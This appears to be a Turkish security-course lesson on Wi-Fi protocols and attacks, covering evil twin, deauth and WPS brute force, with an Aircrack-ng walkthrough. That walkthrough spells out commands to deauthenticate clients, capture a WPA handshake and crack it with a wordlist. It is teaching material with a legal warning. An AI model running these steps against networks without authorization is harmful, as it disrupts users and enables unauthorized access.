🔍
📶

15 — Kablosuz Ağ Güvenliği

Wi-Fi güvenlik protokolleri (WPA/WPA2/WPA3), kablosuz ağ saldırıları ve Aircrack-ng araç seti.

🔐 Wi-Fi Güvenlik Protokolleri

ProtokolŞifrelemeGüvenlikNotlar
WEPRC4❌ KırılmışDakikalar içinde kırılabilir, asla kullanmayın
WPATKIP⚠️ ZayıfWEP'e göre iyileşme ama hala güvensiz
WPA2AES-CCMP✅ GüvenliEn yaygın kullanılan, KRACK açığına dikkat
WPA3SAE✅ En güvenliForward secrecy, brute force koruması

⚡ Kablosuz Ağ Saldırıları

👊

Handshake Yakalama

WPA/WPA2 4-way handshake yakalanarak offline olarak kırılmaya çalışılır. Güçlü şifreler brute force'a dayanıklıdır. Wordlist ve hashcat/aircrack-ng ile denenir.

📡

Evil Twin Attack

Hedef ağın kopyasını oluşturarak kullanıcıları kandırma. Sahte access point kurulur, kullanıcılar otomatik bağlanır. Man-in-the-Middle saldırısı gerçekleştirilir.

💥

Deauth Attack

Deauthentication paketleri göndererek kullanıcıları ağdan düşürme. Handshake yakalama için kullanılır. IEEE 802.11w (Management Frame Protection) ile önlenebilir.

🔍

WPS Saldırısı

WPS PIN brute force ile ağ şifresini elde etme. Reaver ve Bully araçları kullanılır. WPS devre dışı bırakılmalıdır.

🛠️ Aircrack-ng Araç Seti

Aircrack-ng Kullanımı
# Monitor mode'a geçiş
airmon-ng start wlan0

# Ağları tarama
airodump-ng wlan0mon

# Belirli ağı izleme ve handshake yakalama
airodump-ng -c 6 --bssid AA:BB:CC:DD:EE:FF -w capture wlan0mon

# Deauth paketi gönderme (handshake için)
aireplay-ng -0 5 -a AA:BB:CC:DD:EE:FF wlan0mon

# Handshake kırma (wordlist ile)
aircrack-ng -w wordlist.txt capture-01.cap

# Monitor mode'dan çıkış
airmon-ng stop wlan0mon

⚠️ Yasal Uyarı

Kablosuz ağ testleri yalnızca kendi ağınızda veya yazılı izin alınmış ağlarda yapılmalıdır. İzinsiz ağlara erişim girişimi yasadışıdır ve ciddi cezai yaptırımlara yol açabilir.

📝 Notlar 0